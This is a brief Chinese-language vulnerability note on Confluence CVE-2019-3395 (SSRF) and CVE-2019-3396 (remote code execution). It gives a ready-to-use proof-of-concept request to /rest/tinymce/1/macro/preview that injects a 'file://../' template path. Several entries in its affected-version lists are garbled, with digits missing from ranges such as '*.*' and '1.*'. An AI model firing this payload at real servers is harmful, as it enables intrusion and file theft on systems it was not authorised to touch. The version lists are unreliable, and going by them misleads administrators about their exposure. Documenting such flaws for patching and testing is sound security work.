CVE-2019-3395
Date: 2019-04-09 类型: SSRF 影响范围:
- Confluence 1.*.*、*.*、3.*.*、4.*.*、5.*.*
- Confluence 6.0.*、1.*、6.2.*、6.3.*、6.4.*、6.5.*
- Confluence 6.6.* < 6.6.12
- Confluence 6.7.*、8.*、6.9.*、6.10.*、6.11.*
- Confluence 6.12.* < 6.12.3
- Confluence 6.13.* < 6.13.3
- Confluence 6.14.* < 6.14.2
CVE-2019-3396
Date: 2019-04-09 类型: 远程代码执行
复现
POC
/rest/tinymce/1/macro/preview
{"contentId":"12345","macro":{"name":"widget","body":"","params":{"url":"https://www.youtube.com/watch?v=wHEHYJpCkpg","width":"300","height":"200","_template":"file://../"}}}
影响范围:
- Confluence 1.*.*、*.*、3.*.*、4.*.*、5.*.*
- Confluence 6.0.*、1.*、6.2.*、6.3.*、6.4.*、6.5.*
- Confluence 6.6.* < 6.6.12
- Confluence 6.7.*、8.*、6.9.*、6.10.*、6.11.*
- Confluence 6.12.* < 6.12.3
- Confluence 6.13.* < 6.13.3
- Confluence 6.14.* < 6.14.2